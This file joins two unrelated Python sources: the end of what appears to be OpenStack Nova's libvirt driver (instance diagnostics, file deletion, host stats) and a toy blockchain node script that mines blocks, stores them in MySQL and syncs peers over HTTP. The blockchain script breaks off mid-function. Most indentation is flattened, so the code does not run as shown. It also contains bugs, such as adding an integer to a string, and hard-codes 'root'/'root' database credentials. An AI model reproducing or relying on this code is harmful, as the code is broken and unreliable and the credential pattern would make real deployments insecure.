for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = LibvirtDriver._get_io_devices(xml)
for guest_disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(guest_disk)
output[guest_disk + "_read_req"] = stats[0]
output[guest_disk + "_read"] = stats[1]
output[guest_disk + "_write_req"] = stats[2]
output[guest_disk + "_write"] = stats[3]
output[guest_disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def get_instance_diagnostics(self, instance):
domain = self._lookup_by_name(instance['name'])
xml = domain.XMLDesc(0)
xml_doc = etree.fromstring(xml)
(state, max_mem, mem, num_cpu, cpu_time) = domain.info()
config_drive = configdrive.required_by(instance)
launched_at = timeutils.normalize_time(instance['launched_at'])
uptime = timeutils.delta_seconds(launched_at,
timeutils.utcnow())
diags = diagnostics.Diagnostics(state=power_state.STATE_MAP[state],
driver='libvirt',
config_drive=config_drive,
hypervisor_os='linux',
uptime=uptime)
diags.memory_details.maximum = max_mem / units.Mi
diags.memory_details.used = mem / units.Mi
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
num_cpus = len(cputime)
for i in range(num_cpus):
diags.add_cpu(time=cputime[i][2])
except libvirt.libvirtError:
pass
# get io status
dom_io = LibvirtDriver._get_io_devices(xml)
for guest_disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(guest_disk)
diags.add_disk(read_bytes=stats[1],
read_requests=stats[0],
write_bytes=stats[3],
write_requests=stats[2])
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
diags.add_nic(rx_octets=stats[0],
rx_errors=stats[2],
rx_drop=stats[3],
rx_packets=stats[1],
tx_octets=stats[4],
tx_errors=stats[6],
tx_drop=stats[7],
tx_packets=stats[5])
except libvirt.libvirtError:
pass
# Update mac addresses of interface if stats have been reported
if len(diags.nic_details) > 0:
ret = xml_doc.findall('./devices/interface')
index = 0
for node in ret:
    for child in node.getchildren():
        if child.tag == 'mac':
            diags.nic_details[index].mac_address = child.get(
                'address')
    # move on to the next reported NIC so each gets its own mac address
    index += 1
return diags
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
LOG.debug('Checking instance files accessibility %s', instance_path)
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
def _delete_instance_files(self, instance):
# NOTE(mikal): a shim to handle this file not using instance objects
# everywhere. Remove this when that conversion happens.
context = nova_context.get_admin_context(read_deleted='yes')
inst_obj = objects.Instance.get_by_uuid(context, instance['uuid'])
# NOTE(mikal): this code should be pushed up a layer when this shim is
# removed.
attempts = int(inst_obj.system_metadata.get('clean_attempts', '0'))
success = self.delete_instance_files(inst_obj)
inst_obj.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
inst_obj.cleaned = True
inst_obj.save(context)
def delete_instance_files(self, instance):
target = libvirt_utils.get_instance_path(instance)
# A resize may be in progress
target_resize = target + '_resize'
# Other threads may attempt to rename the path, so renaming the path
# to target + '_del' (because it is atomic) and iterating through
# twice in the unlikely event that a concurrent rename occurs between
# the two rename attempts in this method. In general this method
# should be fairly thread-safe without these additional checks, since
# other operations involving renames are not permitted when the task
# state is not None and the task state should be set to something
# other than None by the time this method is invoked.
target_del = target + '_del'
for i in six.moves.range(2):
try:
utils.execute('mv', target, target_del)
break
except Exception:
pass
try:
utils.execute('mv', target_resize, target_del)
break
except Exception:
pass
# Either the target or target_resize path may still exist if all
# rename attempts failed.
remaining_path = None
for p in (target, target_resize):
if os.path.exists(p):
remaining_path = p
break
# A previous delete attempt may have been interrupted, so target_del
# may exist even if all rename attempts during the present method
# invocation failed due to the absence of both target and
# target_resize.
if not remaining_path and os.path.exists(target_del):
LOG.info(_LI('Deleting instance files %s'), target_del,
instance=instance)
remaining_path = target_del
try:
shutil.rmtree(target_del)
except OSError as e:
LOG.error(_LE('Failed to cleanup directory %(target)s: '
'%(e)s'), {'target': target_del, 'e': e},
instance=instance)
# It is possible that the delete failed, if so don't mark the instance
# as cleaned.
if remaining_path and os.path.exists(remaining_path):
LOG.info(_LI('Deletion of %s failed'), remaining_path,
instance=instance)
return False
LOG.info(_LI('Deletion of %s complete'), target_del, instance=instance)
return True
@property
def need_legacy_block_device_info(self):
return False
def default_root_device_name(self, instance, image_meta, root_bdm):
disk_bus = blockinfo.get_disk_bus_for_device_type(
CONF.libvirt.virt_type, image_meta, "disk")
cdrom_bus = blockinfo.get_disk_bus_for_device_type(
CONF.libvirt.virt_type, image_meta, "cdrom")
root_info = blockinfo.get_root_info(
CONF.libvirt.virt_type, image_meta, root_bdm, disk_bus,
cdrom_bus)
return block_device.prepend_dev(root_info['dev'])
def default_device_names_for_instance(self, instance, root_device_name,
*block_device_lists):
ephemerals, swap, block_device_mapping = block_device_lists[:3]
blockinfo.default_device_names(CONF.libvirt.virt_type,
nova_context.get_admin_context(),
instance, root_device_name,
ephemerals, swap,
block_device_mapping)
def is_supported_fs_format(self, fs_type):
return fs_type in [disk.FS_FORMAT_EXT2, disk.FS_FORMAT_EXT3,
disk.FS_FORMAT_EXT4, disk.FS_FORMAT_XFS]
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, update the stats first.
"""
if refresh or not self._stats:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = (self.driver.
_get_disk_over_committed_size_total())
# Disk available least size
available_least = disk_free_gb * units.Gi - disk_over_committed
return (available_least / units.Gi)
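# Illustrative numbers: with disk_free_gb = 100 and a total
# over-committed size of 10 GiB, available_least is 90 GiB in bytes
# and the value returned is 90 (GB).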
LOG.debug("Updating host stats")
disk_info_dict = self.driver._get_local_gb_info()
data = {}
# NOTE(dprince): calling capabilities before getVersion works around
# an initialization issue with some versions of Libvirt (1.0.5.5).
# See: https://bugzilla.redhat.com/show_bug.cgi?id=1000116
# See: https://bugs.launchpad.net/nova/+bug/1215593
data["supported_instances"] = \
self.driver._get_instance_capabilities()
data["vcpus"] = self.driver._get_vcpu_total()
data["memory_mb"] = self.driver._get_memory_mb_total()
data["local_gb"] = disk_info_dict['total']
data["vcpus_used"] = self.driver._get_vcpu_used()
data["memory_mb_used"] = self.driver._get_memory_mb_used()
data["local_gb_used"] = disk_info_dict['used']
data["hypervisor_type"] = self.driver._get_hypervisor_type()
data["hypervisor_version"] = self.driver._get_hypervisor_version()
data["hypervisor_hostname"] = self.driver._get_hypervisor_hostname()
data["cpu_info"] = self.driver._get_cpu_info()
data['disk_available_least'] = _get_disk_available_least()
data['pci_passthrough_devices'] = \
self.driver._get_pci_passthrough_devices()
self._stats = data
return data
myBlockchain3.py
import hashlib
import time
import csv
import random
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
import json
import re
from urllib.parse import parse_qs
from urllib.parse import urlparse
import threading
import cgi
import uuid
from tempfile import NamedTemporaryFile
import shutil
import requests
import pymysql
from sqlalchemy import create_engine
import pandas as pd
import socket
IP_NUMBER = "127.0.0.1"
# socket.gethostbyname(socket.getfqdn())
PORT_NUMBER = 8099
#Set the information in the database that will be linked to this code.
DATABASE_SVR_NAME = "databasebc"
DATABASE_SVR_IP = 'localhost'
DATABASE_SVR_PORT = 3300
DATABASE_SVR_USER = "root"
DATABASE_SVR_PW = "root"
DATABASE_BC_TABLE = "blockchain"
DATABASE_ND_TABLE = "node"
#Set the ip address and port number of the transaction pool database.
DATABASE_TPSVR_IP = "http://localhost:8089"
#Set the ip address and port number of the miner list.
#miner list = The IP address and port number where the code is running.
DATABASE_MINER_LIST_IP = "http://localhost"
DATABASE_MINER_LIST_PORT = 8081
#A variable that determines whether this node runs as 'master' or 'serve'.
MASTER = True
SERVE = False
g_difficulty = 2
class Block:
def __init__(self, index, previousHash, timestamp, data, currentHash, proof, merkleHash):
self.index = index
self.previousHash = previousHash
self.timestamp = timestamp
self.data = data
self.currentHash = currentHash
self.proof = proof
self.merkleHash = merkleHash
def toJSON(self):
return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True, indent=4)
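#For illustration only, toJSON() on a block would produce something like:
#{
#    "currentHash": "5e2d...",
#    "data": "[uuid]UserID kim sent 10 bitTokens ...",
#    "index": 1,
#    "merkleHash": "9c1f...",
#    "previousHash": "000a...",
#    "proof": 12345,
#    "timestamp": 1625000000.0
#}
#(all field values here are made up; keys are sorted by json.dumps).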
class txData:
def __init__(self, commitYN, sender, amount, receiver, fee, uuid, transactionTime):
self.commitYN = commitYN
self.sender = sender
self.amount = amount
self.receiver = receiver
self.fee = fee
self.uuid = uuid
self.transactionTime = transactionTime
class Node:
def __init__(self, ip, port, tryConnect):
self.ip = ip
self.port = port
self.tryConnect = tryConnect
#Generates the Genesis block.
def generateGenesisBlock(timestamp, proof):
isSuccess = True
newBlock = None
GenesisTxData = [{"commitYN" : "0", "sender": "Genesis Block", "amount": "0", \
"receiver": "kim", "fee": "0"}]
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
try:
URL = DATABASE_TPSVR_IP + "/txData/new"
res = requests.post(URL, headers=reqHeader, data=json.dumps(GenesisTxData))
if res.status_code == 200:
print("Genesis txData sent ok.")
txData, txTF = getTxData(0)
merkleHash = calculateMerkleHash(txData)
tempHash = calculateHash(0, '0', timestamp, proof, merkleHash)
genesisBlockData = getStrTxData(txData)
newBlock = Block(0, '0', timestamp, genesisBlockData, tempHash, proof, merkleHash)
else:
print(URL + " responding error " + 404)
isSuccess = False
except:
print("transaction_pool server : " + DATABASE_TPSVR_IP + " is not responding.")
isSuccess = False
finally:
if isSuccess:
print("Success to generate genesis block : \n" + str(newBlock.__dict__))
return newBlock, isSuccess
#Creates a hash of the block.
def calculateHash(index, previousHash, timestamp, proof, merkleHash):
value = str(index) + str(previousHash) + str(timestamp) + str(proof) + merkleHash
sha = hashlib.sha256(value.encode('utf-8'))
return str(sha.hexdigest())
#Returns a list of txData objects in a single string.
def getStrTxData(txData) :
strTxData = ''
if len(txData) > 0:
for i in txData:
transaction = "[" + i['uuid'] + "]" "UserID " + i['sender'] + " sent " + i['amount'] + " bitTokens to UserID " + \
i['receiver'] + " fee "+ i['fee'] + " transaction time " + str(i['transactionTime']) + ". "
print(transaction)
strTxData += transaction
return strTxData
#Create a Merkle hash.
def calculateMerkleHash(txData) :
txDataList = []
print("hash merkling..................")
if len(txData) > 0:
for i in txData:
transaction = "[" + i['uuid'] + "]" "UserID " + i['sender'] + " sent " + i['amount'] + " bitTokens to UserID " + \
i['receiver'] + " fee "+ i['fee'] + " transaction time " + str(i['transactionTime']) + ". "
print(transaction)
txDataList.append(transaction)
return rcGetMerkleHash(txDataList)
#Create and return a Merkle hash through recursion.
def rcGetMerkleHash(target) :
    #check
    print("current len of Target = " + str(len(target)))
    if len(target) <= 1 :
        sha = hashlib.sha256(target[0].encode('utf-8'))
        return str(sha.hexdigest())
    else :
        newTarget = []
        # Hash adjacent pairs of entries; an unpaired last entry is hashed on its own.
        for i in range(0, len(target) - 1, 2):
            sha = hashlib.sha256((target[i] + target[i + 1]).encode('utf-8'))
            newTarget.append(str(sha.hexdigest()))
        if (len(target) % 2) != 0:
            sha = hashlib.sha256(target[len(target) - 1].encode('utf-8'))
            newTarget.append(str(sha.hexdigest()))
        return rcGetMerkleHash(newTarget)
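# Illustrative sketch (not part of the original module): how the Merkle helpers above
# are expected to be called. The sample transaction dict is an assumption based on the
# keys read inside calculateMerkleHash; nothing here runs at import time.
def _merkleHashDemo():
    sampleTx = [{"uuid": "demo-uuid", "sender": "alice", "amount": "1",
                 "receiver": "bob", "fee": "0", "transactionTime": 0}]
    # With a single transaction the Merkle root is simply the hash of that entry.
    return calculateMerkleHash(sampleTx)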
#Calculate and return the hash based on the information in the block.
def calculateHashForBlock(block):
return calculateHash(block.index, block.previousHash, block.timestamp, block.proof, block.merkleHash)
#Returns the most recently created block.
def getLatestBlock(blockchain):
lengthOfBlockChain = len(blockchain) - 1
if len(blockchain) == 0 :
        lengthOfBlockChain = 0
return blockchain[lengthOfBlockChain]
#Generate the next block.
def generateNextBlock(blockList, txData, timestamp, proof):
print("Trying to generate next block...........")
isSuccess = True
newBlock = None
try:
previousBlock = getLatestBlock(blockList)
nextIndex = int(previousBlock.index) + 1
nextTimestamp = timestamp
strTxData = getStrTxData(txData)
merkleHash = calculateMerkleHash(txData)
newBlockFound = False
while not newBlockFound :
nextHash = calculateHash(nextIndex, previousBlock.currentHash, nextTimestamp, proof, merkleHash)
if nextHash[0:g_difficulty] == '0' * g_difficulty:
newBlockFound = True
else:
proof += 1
newBlock = Block(nextIndex, previousBlock.currentHash, nextTimestamp, strTxData, nextHash, proof, merkleHash)
except :
print("Fail to mine next block")
isSuccess = False
if isSuccess :
print("Success to generate next block : \n" + str(newBlock.__dict__))
return newBlock, isSuccess
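# Minimal sketch (assumption, for illustration only): the same proof-of-work search that
# generateNextBlock performs inline, isolated so it can be exercised on its own. It keeps
# incrementing the proof until the block hash starts with g_difficulty zero characters.
def _proofOfWorkDemo(index, previousHash, timestamp, merkleHash):
    proof = 0
    while True:
        candidate = calculateHash(index, previousHash, timestamp, proof, merkleHash)
        if candidate[0:g_difficulty] == '0' * g_difficulty:
            return proof, candidate
        proof += 1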
#Enter the information of the block into the table in the linked database.
def writeBlockchain(blockchain):
print("Trying write block to blockchain table..........")
tableBlockList, readSuccess = readBlockchain()
isSuccess = True
if readSuccess :
if len(tableBlockList) != 0 :
lastBlock = getLatestBlock(tableBlockList)
if lastBlock.index + 1 != blockchain.index :
print("Failed to write new block to database. new block is invalid.")
isSuccess = False
if isSuccess :
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME)
try:
with conn.cursor() as curs:
print(blockchain.index, blockchain.previousHash, str(blockchain.timestamp), \
blockchain.data, blockchain.currentHash, blockchain.proof, blockchain.merkleHash)
sql = "INSERT INTO " + DATABASE_BC_TABLE + " VALUES (%s,%s,%s,%s,%s,%s,%s)"
curs.execute(sql,(blockchain.index, blockchain.previousHash, str(blockchain.timestamp), \
blockchain.data, blockchain.currentHash, blockchain.proof, blockchain.merkleHash))
conn.commit()
        except :
            print("Failed to insert new block on database.")
            isSuccess = False
finally:
conn.close()
else :
print("Failed to read blockchain data from database")
isSuccess = False
if isSuccess :
print("Succeed to write new block on database.")
return isSuccess
#Insert the block information of the block object list in the table of the linked database.
def writeAllBlockchain(blockchainList):
result = 1
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME)
try:
print("Trying delete all data on table " + DATABASE_BC_TABLE + " for renewal...........")
with conn.cursor() as curs:
sql = "DELETE FROM " + DATABASE_BC_TABLE
curs.execute(sql)
conn.commit()
except:
print("Failed to delete all data.")
result = -1
finally:
conn.close()
print("Trying write block to blockchain table..........")
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME, charset = 'utf8')
try:
for blockchain in blockchainList:
with conn.cursor() as curs:
print(blockchain.index, blockchain.previousHash, str(blockchain.timestamp), \
blockchain.data, blockchain.currentHash, blockchain.proof, blockchain.merkleHash)
sql = "INSERT INTO " + DATABASE_BC_TABLE + " VALUES (%s,%s,%s,%s,%s,%s,%s)"
curs.execute(sql,(blockchain.index, blockchain.previousHash, str(blockchain.timestamp), \
blockchain.data, blockchain.currentHash, blockchain.proof, blockchain.merkleHash))
conn.commit()
except :
print("Failed to insert new block on database.")
result = -1
finally:
conn.close()
if result == 1 :
print("Succeed to write new block on database.")
return result
#Returns all block information in the table in the database.
def readBlockchain():
print("readBlockchain")
isSuccess = False
blockDataList = []
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, password=DATABASE_SVR_PW, \
db=DATABASE_SVR_NAME, charset='utf8')
try:
print("Trying to read blockchain data from " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME + "...........")
with conn.cursor() as cursor :
sql = "select * from " + DATABASE_BC_TABLE
cursor.execute(sql)
rows = cursor.fetchall()
for data in rows:
block = Block(data[0], data[1], data[2], data[3], data[4], data[5], data[6])
blockDataList.append(block)
isSuccess = True
except:
print("Failed to read blockchain data from " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME)
finally:
conn.close()
if isSuccess :
print("Success to read blockchain data from " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME)
return blockDataList, isSuccess
#Request an update for the transaction details used to create the block to The transaction pool server.
def updateTx(blockData, mode = 'update'):
isSuccess = True
if mode == 'update' :
query = '/txData/update'
print("response update mode : 0 -> 1")
else :
query = '/txData/rollBack'
print("response rollback mode : 1 -> 0")
phrase = re.compile(
r"\w+[-]\w+[-]\w+[-]\w+[-]\w+")
print(blockData.data)
matchList = phrase.findall(blockData.data)
print(matchList)
if len(matchList) == 0:
print("No Match Found! " + str(blockData.data) + "block idx: " + str(blockData.index))
isSuccess = False
else :
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
blockDict = []
blockDict.append(blockData.__dict__)
print(blockDict)
try:
URL = DATABASE_TPSVR_IP + query
print(URL)
res = requests.post(URL, headers=reqHeader, data=json.dumps(blockDict))
if res.status_code == 200:
print("sent ok.")
else:
print(URL + " responding error " + 404)
isSuccess = False
except:
print("transaction Server " + URL + " is not responding.")
isSuccess = False
if isSuccess :
if mode == 'update' :
print('Succeed to update')
else :
print('Succeed to rollback')
return isSuccess
#Request the transaction details whose 'commitYN' value is zero, or the entire transaction history.
def getTxData(chooseData):
url = DATABASE_TPSVR_IP + "/getTxData/zero"
if (chooseData == 1) :
url = DATABASE_TPSVR_IP + "/getTxData/all"
txData = []
isSuccess = True
try :
print("Trying to get txData from " + DATABASE_TPSVR_IP + "...........")
res = requests.get(url=url)
if res.status_code == 200 :
txData = json.loads(res.text)
res.close()
else :
isSuccess = False
except:
isSuccess = False
return txData, isSuccess
#Mining new blocks.
def mineNewBlock():
blockList, blockTF = readBlockchain()
urlData, txTF = getTxData(0)
timestamp = time.time()
proof = 0
if blockTF and txTF :
if len(blockList) == 0 :
newBlock, generateSuccessBc = generateGenesisBlock(timestamp, proof)
else:
newBlock, generateSuccessBc = generateNextBlock(blockList, urlData, timestamp, proof)
print(newBlock, generateSuccessBc)
if generateSuccessBc :
upResult = updateTx(newBlock, mode = 'update')
else :
print("mineNewBlock : Failed to generate NewBlock")
return
if upResult :
wrResult = writeBlockchain(newBlock)
else :
print("mineNewBlock : Failed to update txdata on transaction pool table used create block")
rollBackSuccess = updateTx(newBlock, mode = 'rollback')
if rollBackSuccess :
print("mineNewBlock : Succeed to rollback txData")
return
if wrResult :
print("mineNewBlock : Succeed to write new block on table ")
broadResult = broadcastNewBlock(newBlock)
else :
print("mineNewBlock : Fail to write new block on table ")
rollBackSuccess = updateTx(newBlock, mode='rollback')
if rollBackSuccess :
print("mineNewBlock : Succeed to rollback txData")
return
if broadResult :
print("mineNewBlock : Succeed broadcasting new block")
return
else :
print("mineNewBlock : Failed to broadcasting new block")
syncSuccess = syncBlockChain()
if (syncSuccess == 1) or (syncSuccess == 2) or (syncSuccess == -2) or (syncSuccess == -1):
print("mineNewBlock : Succeed to sync all block data")
else :
print("mineNewBlock : Failed to sync all block data")
rollBackSuccess = updateTx(newBlock, mode='rollback')
if rollBackSuccess :
print("mineNewBlock : Succeed to rollback txData")
return
else :
print("mineNewBlock : There's no Transaction pool data in Url.")
return
def mine():
mineNewBlock()
#Validate blocks.
def isSameBlock(block1, block2):
if str(block1.index) != str(block2.index):
return False
elif str(block1.previousHash) != str(block2.previousHash):
return False
elif str(block1.timestamp) != str(block2.timestamp):
return False
elif str(block1.data) != str(block2.data):
return False
elif str(block1.currentHash) != str(block2.currentHash):
return False
elif str(block1.proof) != str(block2.proof):
return False
elif str(block1.merkleHash) != str(block2.merkleHash):
return False
return True
#Validate newly generated blocks.
def isValidNewBlock(newBlock, previousBlock):
if int(previousBlock.index) + 1 != int(newBlock.index):
print('Indices Do Not Match Up')
return False
    # Check that the new block chains correctly onto the previous block
elif previousBlock.currentHash != newBlock.previousHash:
print("Previous hash does not match")
return False
    # Verify the hash
elif calculateHashForBlock(newBlock) != newBlock.currentHash:
print("Hash is invalid")
return False
elif newBlock.currentHash[0:g_difficulty] != '0' * g_difficulty:
print("Hash difficulty is invalid")
return False
return True
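# Sketch (assumption, not in the original file): validating a freshly received block
# against the local chain tip, mirroring what the /postBlock/validateBlock handler does.
def _validateAgainstTipDemo(newBlock):
    blockList, readSuccess = readBlockchain()
    if not (readSuccess and len(blockList) > 0):
        return False
    return isValidNewBlock(newBlock, getLatestBlock(blockList))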
#Validate the validity of the blockchain.
def isValidChain(bcToValidate):
genesisBlock = []
bcToValidateForBlock = []
# Read GenesisBlock
try:
blockReader, readSuccess = readBlockchain()
for line in blockReader:
block = Block(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
genesisBlock.append(block)
except:
print("file open error in isValidChain")
return False
# transform given data to Block object
for line in bcToValidate:
# print(type(line))
# index, previousHash, timestamp, data, currentHash, proof
block = Block(line['index'], line['previousHash'], line['timestamp'], line['data'], line['currentHash'],
line['proof'], line['merkleHash'])
bcToValidateForBlock.append(block)
# if it fails to read block data from db(csv)
if not genesisBlock:
print("fail to read genesisBlock")
return False
# compare the given data with genesisBlock
if not isSameBlock(bcToValidateForBlock[0], genesisBlock[0]):
print('Genesis Block Incorrect')
return False
# tempBlocks = [bcToValidateForBlock[0]]
# for i in range(1, len(bcToValidateForBlock)):
# if isValidNewBlock(bcToValidateForBlock[i], tempBlocks[i - 1]):
# tempBlocks.append(bcToValidateForBlock[i])
# else:
# return False
for i in range(0, len(bcToValidateForBlock)):
if isSameBlock(genesisBlock[i], bcToValidateForBlock[i]) == False:
return False
return True
#Insert the requested ip address and port number into the node table of the linked database.
#Ask each server for the requested ip address and port number to synchronize the node tables of each server's database.
def addNode(receivedNode, mode='new'):
    isSuccess = True
    for getNode in receivedNode :
if mode == 'new':
newNode = Node(getNode['ip'], str(getNode['port']), "0")
else:
newNode = Node(getNode['ip'], str(getNode['port']), str((getNode['tryConnect'])))
sameNodeFound = False
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME, charset='utf8')
try:
print("Trying to find new node on database...........")
with conn.cursor() as cursor:
sql = "Select ip, port FROM " + DATABASE_ND_TABLE + " WHERE ip = %s AND port = %s"
cursor.execute(sql, (newNode.ip, newNode.port))
rows = cursor.fetchall()
conn.commit()
if len(rows) != 0:
print("new node is already existed.")
sameNodeFound = True
except:
print("Failed to access nodelist database.")
isSuccess = False
finally:
conn.close()
if not sameNodeFound :
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME, charset='utf8')
try:
print("Trying to add new node on database...........")
with conn.cursor() as curs:
sql = "INSERT INTO " + DATABASE_ND_TABLE + " VALUES (%s,%s,%s)"
curs.execute(sql, (newNode.ip, newNode.port, newNode.tryConnect))
conn.commit()
print('Success to write new node on' + DATABASE_ND_TABLE + ".")
except:
print("Failed to access nodelist database.")
isSuccess = False
finally:
conn.close()
else:
isSuccess = False
if mode == 'new' :
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
newNodeList = []
newNodeList.append(newNode.__dict__)
serverData = []
query = "serverList/get"
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "/" + query
try:
print("Trying to get serverList from " + DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "...........")
print(URL)
res = requests.get(URL)
if res.status_code == 200:
serverData = json.loads(res.text)
print("sent ok.")
else:
print(URL + " responding error " + 404)
isSuccess = False
except:
print("serverlist Server " + URL + " is not responding.")
isSuccess = False
for i in serverData:
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port']:
continue
else:
URL = "http://" + i['ip'] + ":" + i['port'] + "/postNode/newSvr"
print(URL)
try:
print("trying send added node to " + i['ip'] + ":" + i['port'] + " in SVR_LIST...........")
res = requests.post(URL, headers=reqHeader, data=json.dumps(newNodeList))
if res.status_code == 200:
print("sent ok.")
else:
print("Failed to send new node to " + i['ip'] + ":" + i['port'] + " in SVR_LIST >> 404")
except:
print("Failed to send new node to " + i['ip'] + ":" + i['port'] + " in SVR_LIST >> not responding")
return isSuccess
#Returns all data in the nodelist table in the database.
def readNodes() :
nodeDictList = []
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME)
sql = "SELECT * FROM " + DATABASE_ND_TABLE
try :
with conn.cursor() as curs :
curs.execute(sql)
nodeList = curs.fetchall()
for line in nodeList :
node = Node(line[0], line[1], line[2])
nodeDictList.append(node.__dict__)
except:
print("Failed to get node data from database.")
finally:
conn.close()
return nodeDictList
#Counts rows in the database.
def row_count():
try:
list, readSuccess = readBlockchain()
return len(list)
except:
return 0
#Compare the block data contained in the requested URL with your block data
#and synchronize the data according to the results.
def compareMerge(bcDict):
bcToValidateForBlock = []
heldBlock = []
try:
blockchainList, readSuccess = readBlockchain()
heldBlock = blockchainList
except:
print("file open error in compareMerge or No database exists")
return -1
if len(heldBlock) == 0:
print("fail to read")
return -2
for line in bcDict:
block = Block(line['index'], line['previousHash'], line['timestamp'], line['data'], line['currentHash'],
line['proof'], line['merkleHash'])
bcToValidateForBlock.append(block)
    #Compare the requested URL's Genesis block with mine.
if not isSameBlock(bcToValidateForBlock[0], heldBlock[0]):
print('Genesis Block Incorrect')
return -1
if not isValidNewBlock(bcToValidateForBlock[-1], heldBlock[-1]):
        #Compare the requested URL's latest block with my latest block.
if isSameBlock(heldBlock[-1], bcToValidateForBlock[-1]):
print('latest block == broadcasted last block, already updated')
return 2
#Compare the length of block data
elif len(bcToValidateForBlock) > len(heldBlock):
if not isSameBlock(heldBlock[0], bcToValidateForBlock[0]):
print("Block Information Incorrect #1")
return -1
tempBlocks = [bcToValidateForBlock[0]]
for i in range(1, len(heldBlock)):
if isValidNewBlock(bcToValidateForBlock[i], tempBlocks[i - 1]):
tempBlocks.append(bcToValidateForBlock[i])
else:
return -1
for j in range(len(heldBlock), len(bcToValidateForBlock)) :
tempBlocks.append(bcToValidateForBlock[j])
writeAllBlockchain(bcToValidateForBlock)
return 1
elif len(bcToValidateForBlock) < len(heldBlock):
tempBlocks = [heldBlock[0]]
for i in range(1, len(bcToValidateForBlock)):
if isValidNewBlock(heldBlock[i], tempBlocks[i - 1]):
tempBlocks.append(heldBlock[i])
else:
return -1
print(len(heldBlock))
for j in range(len(bcToValidateForBlock), len(heldBlock)):
print(j)
tempBlocks.append(heldBlock[j])
print("We have a better chain")
return 3
elif len(bcToValidateForBlock) == len(heldBlock) :
for i in range (len(heldBlock) - 1, 0, -1):
                if float(bcToValidateForBlock[i].timestamp) > float(heldBlock[i].timestamp) :
tempBlocks = [heldBlock[0]]
for i in range(1, len(heldBlock)):
if isValidNewBlock(heldBlock[i], tempBlocks[i - 1]):
tempBlocks.append(heldBlock[i])
else:
return -1
print("We have a better chain")
return 3
                elif float(bcToValidateForBlock[i].timestamp) < float(heldBlock[i].timestamp):
tempBlocks = [bcToValidateForBlock[0]]
for i in range(1, len(bcToValidateForBlock)):
if isValidNewBlock(bcToValidateForBlock[i], tempBlocks[i - 1]):
tempBlocks.append(bcToValidateForBlock[i])
else:
return -1
writeAllBlockchain(bcToValidateForBlock)
return 1
print("Block Information Incorrect")
return -2
else:
print("Block Information Incorrect #2")
return -1
else: # very normal case (ex> we have index 100 and receive index 101 ...)
tempBlocks = [bcToValidateForBlock[0]]
for i in range(1, len(bcToValidateForBlock)):
if isValidNewBlock(bcToValidateForBlock[i], tempBlocks[i - 1]):
tempBlocks.append(bcToValidateForBlock[i])
else:
